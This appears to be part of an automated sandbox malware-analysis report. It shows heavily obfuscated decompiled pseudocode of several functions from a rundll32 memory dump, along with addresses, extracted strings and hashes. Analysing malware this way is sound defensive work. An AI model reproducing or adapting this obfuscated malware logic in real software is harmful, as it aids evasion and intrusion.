				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E007A1FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E007BDCF7(_v1684, 0x7a1080, __eflags);
									_pop(_t546);
									__eflags = E007AAAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E007AA8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E007AF002(2 + E007ACB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E007ACB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E007B46BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x7c3e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E007BDCF7(_v1624, 0x7a1020, _t618);
													E007B176B( &_v1040, _t618);
													_t556 =  *0x7c3e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E007B1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E007AA8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

0x007c0056
0x007c005c
0x007c0066
0x007c006d
0x007c0075
0x007c007d
0x007c0088
0x007c0093
0x007c009e
0x007c00a6
0x007c00ab
0x007c00b3
0x007c00bb
0x007c00c3
0x007c00cf
0x007c00d6
0x007c00e4
0x007c00e9
0x007c00fa
0x007c00fd
0x007c0104
0x007c010f
0x007c011a
0x007c0122
0x007c012d
0x007c013a
0x007c0143
0x007c0147
0x007c014b
0x007c0153
0x007c015e
0x007c0169
0x007c0174
0x007c0184
0x007c0188
0x007c018d
0x007c0195
0x007c01a7
0x007c01ac
0x007c01b5
0x007c01c0
0x007c01d2
0x007c01d7
0x007c01e0
0x007c01eb
0x007c01fd
0x007c0202
0x007c020b
0x007c0216
0x007c0228
0x007c022b
0x007c0237
0x007c023c
0x007c0245
0x007c0250
0x007c025d
0x007c0260
0x007c0264
0x007c026c
0x007c0274
0x007c027c
0x007c0284
0x007c028c
0x007c0294
0x007c029c
0x007c02a4
0x007c02ac
0x007c02b0
0x007c02b5
0x007c02ba
0x007c02c2
0x007c02ce
0x007c02d3
0x007c02d9
0x007c02e1
0x007c02e9
0x007c02f1
0x007c02f9
0x007c0305
0x007c0308
0x007c030c
0x007c0314
0x007c031c
0x007c0324
0x007c032c
0x007c0331
0x007c0339
0x007c0341
0x007c034c
0x007c0357
0x007c0362
0x007c036d
0x007c0378
0x007c0383
0x007c0390
0x007c0399
0x007c039d
0x007c03a5
0x007c03ad
0x007c03b7
0x007c03bb
0x007c03c3
0x007c03cb
0x007c03d3
0x007c03d8
0x007c03dd
0x007c03e5
0x007c03ed
0x007c03f2
0x007c03f7
0x007c03ff
0x007c040a
0x007c0415
0x007c0422
0x007c042a
0x007c042f
0x007c0434
0x007c043c
0x007c0444
0x007c044c
0x007c0454
0x007c045c
0x007c0464
0x007c046c
0x007c0471
0x007c0479
0x007c0481
0x007c0489
0x007c0491
0x007c0499
0x007c04a1
0x007c04b5
0x007c04ba
0x007c04c1
0x007c04cc
0x007c04d7
0x007c04e2
0x007c04ed
0x007c04f8
0x007c0503
0x007c050b
0x007c0516
0x007c0521
0x007c0530
0x007c0533
0x007c0537
0x007c053b
0x007c0543
0x007c054b
0x007c055e
0x007c0565
0x007c0570
0x007c0580
0x007c0584
0x007c058c
0x007c0594
0x007c05a1
0x007c05ad
0x007c05b6
0x007c05b7
0x007c05bb
0x007c05c3
0x007c05cb
0x007c05d0
0x007c05d5
0x007c05dd
0x007c05e5
0x007c05ed
0x007c05f8
0x007c05fc
0x007c0604
0x007c060f
0x007c061a
0x007c0625
0x007c062d
0x007c0642
0x007c0647
0x007c064d
0x007c0655
0x007c065d
0x007c0669
0x007c066e
0x007c0674
0x007c067c
0x007c0684
0x007c068c
0x007c0697
0x007c069f
0x007c06aa
0x007c06b2
0x007c06b7
0x007c06c4
0x007c06c5
0x007c06cc
0x007c06d0
0x007c06d8
0x007c06e0
0x007c06e5
0x007c06f3
0x007c06f7
0x007c06ff
0x007c070a
0x007c0715
0x007c0720
0x007c0720
0x007c0722
0x007c0723
0x007c0723
0x007c0723
0x007c0728
0x007c0728
0x007c072e
0x007c098a
0x007c0991
0x00000000
0x007c0734
0x007c073a
0x007c08ea
0x007c08f3
0x007c08fb
0x007c0901
0x007c095c
0x007c0967
0x007c096a
0x007c096f
0x007c0993
0x007c0995
0x007c099a
0x007c0740
0x007c0742
0x007c08ca
0x007c08d1
0x007c08d4
0x007c08d6
0x007c08de
0x00000000
0x007c0748
0x007c074e
0x007c0831
0x007c083c
0x007c0840
0x007c0855
0x007c0856
0x007c085b
0x007c085e
0x007c0720
0x007c0720
0x007c0722
0x00000000
0x007c0722
0x007c0754
0x007c075a
0x007c0811
0x007c0817
0x007c081f
0x007c081f
0x007c0822
0x00000000
0x00000000
0x007c081c
0x007c081c
0x007c081c
0x007c0824
0x007c0827
0x00000000
0x007c0760
0x007c0760
0x007c0766
0x007c076c
0x007c0778
0x007c0786
0x007c0794
0x007c07cb
0x007c07d8
0x007c07dc
0x007c07ea
0x007c07ff
0x007c0804
0x007c0807
0x007c0720
0x007c0720
0x007c0722
0x007c0723
0x007c0723
0x00000000
0x007c0723
0x007c0720
0x007c0766
0x007c075a
0x007c074e
0x007c0742
0x007c073a
0x007c099b
0x007c099b
0x007c09b4
0x007c09b4
0x007c0723

Strings

E+A, xrefs: 007C0169
Agz, xrefs: 007C02A4, 007C02BA
DWK, xrefs: 007C040A
g, xrefs: 007C04A1
pw, xrefs: 007C043C

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Agz$DWK$E+A$g$pw
API String ID: 0-1474679353
Opcode ID: bfc398201f9c2288b8fcebfdaa715cc79c6961a55db212798cb6680cce06b4f5
Instruction ID: 7132b238121876cc6a202755c0b050db621b15d3d1ae722f97415bd13748b6a1
Opcode Fuzzy Hash: bfc398201f9c2288b8fcebfdaa715cc79c6961a55db212798cb6680cce06b4f5
Instruction Fuzzy Hash: B632117250C380CFE368CF25C94AB8BBBF2BBC5748F10891DE19986261D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007AF09B Relevance: 6.6, Strings: 5, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007AF09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007BDA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E007AB6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E007A8969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E007A47CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E007BDCF7(_v2620, 0x7a1308, _t515),  &_v1560, _v2720, _v2688);
							E007AA8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E007AEA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E007B46BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E007A47CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E007BDCF7(_v2708, 0x7a1348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E007AA8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E007AAB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}

0x007af09b
0x007af0a1
0x007af0ae
0x007af0b6
0x007af0c1
0x007af0c9
0x007af0d1
0x007af0d9
0x007af0e1
0x007af0e9
0x007af0fa
0x007af0fc
0x007af101
0x007af106
0x007af110
0x007af115
0x007af11b
0x007af123
0x007af136
0x007af139
0x007af140
0x007af14b
0x007af153
0x007af160
0x007af164
0x007af16c
0x007af174
0x007af179
0x007af185
0x007af18a
0x007af190
0x007af198
0x007af1a4
0x007af1a9
0x007af1af
0x007af1b4
0x007af1bc
0x007af1c4
0x007af1cc
0x007af1d4
0x007af1dc
0x007af1e7
0x007af1f2
0x007af1fd
0x007af205
0x007af20a
0x007af213
0x007af216
0x007af21a
0x007af222
0x007af22a
0x007af234
0x007af238
0x007af240
0x007af24d
0x007af258
0x007af263
0x007af26b
0x007af276
0x007af27b
0x007af281
0x007af289
0x007af291
0x007af29c
0x007af2a7
0x007af2b2
0x007af2ba
0x007af2bf
0x007af2c7
0x007af2d4
0x007af2d7
0x007af2db
0x007af2e8
0x007af2ec
0x007af2f4
0x007af307
0x007af30e
0x007af319
0x007af321
0x007af326
0x007af32e
0x007af336
0x007af346
0x007af34a
0x007af34f
0x007af357
0x007af369
0x007af36e
0x007af377
0x007af382
0x007af38d
0x007af398
0x007af3a3
0x007af3af
0x007af3b4
0x007af3ba
0x007af3c2
0x007af3ca
0x007af3d2
0x007af3dd
0x007af3e8
0x007af3f3
0x007af3fb
0x007af408
0x007af409
0x007af40d
0x007af415
0x007af41d
0x007af42b
0x007af42f
0x007af437
0x007af43e
0x007af44b
0x007af453
0x007af458
0x007af460
0x007af468
0x007af470
0x007af478
0x007af480
0x007af488
0x007af490
0x007af498
0x007af4a0
0x007af4a8
0x007af4b0
0x007af4b8
0x007af4c3
0x007af4ce
0x007af4d9
0x007af4e1
0x007af4e6
0x007af4ee
0x007af4f6
0x007af4fe
0x007af50c
0x007af50f
0x007af513
0x007af51b
0x007af523
0x007af52b
0x007af530
0x007af538
0x007af543
0x007af54b
0x007af556
0x007af561
0x007af569
0x007af574
0x007af587
0x007af58e
0x007af599
0x007af5a1
0x007af5a6
0x007af5ae
0x007af5b6
0x007af5c3
0x007af5c7
0x007af5cf
0x007af5d7
0x007af5df
0x007af5e7
0x007af5ef
0x007af5f7
0x007af602
0x007af60a
0x007af611
0x007af61c
0x007af624
0x007af62c
0x007af630
0x007af638
0x007af640
0x007af648
0x007af650
0x007af658
0x007af663
0x007af66b
0x007af676
0x007af67e
0x007af686
0x007af68e
0x007af696
0x007af6a4
0x007af7b0
0x00000000
0x007af6aa
0x007af6aa
0x007af6b0
0x007af883
0x007af883
0x007af889
0x00000000
0x00000000
0x007af6b6
0x007af6d2
0x007af700
0x007af70a
0x007af70f
0x007af71b
0x007af762
0x007af777
0x007af795
0x007af799
0x007af79e
0x007af7a3
0x007af7a9
0x00000000
0x007af7a9
0x007af7a3
0x007af6b0
0x007af898
0x007af898
0x007af7ba
0x007af7c8
0x007af7cf
0x007af7de
0x007af7df
0x007af7e4
0x007af7f0
0x007af837
0x007af843
0x007af849
0x007af858
0x007af85c
0x007af85e
0x007af85f
0x007af861
0x007af863
0x007af86e
0x007af875
0x007af876
0x007af87b
0x007af87e
0x00000000

Strings

), xrefs: 007AF574
kD, xrefs: 007AF398
5, xrefs: 007AF44B
Q0, xrefs: 007AF3F3
<!, xrefs: 007AF650

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: kD$)$5$<!$Q0
API String ID: 0-101729813
Opcode ID: 1ebb8c4e574fece0d8ddb4ef4e6e4c46671ac3d4cd6d27df72572ad92cb7adf8
Instruction ID: f2169edba3229e41787a6d9e029a5e18e8aa9f37856c1731e976855124925c9a
Opcode Fuzzy Hash: 1ebb8c4e574fece0d8ddb4ef4e6e4c46671ac3d4cd6d27df72572ad92cb7adf8
Instruction Fuzzy Hash: 241200715083809FD3A8CF21C48AA8BBBE2FBC5758F508A1DF5D986260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B66CA Relevance: 6.5, Strings: 5, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007B66CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
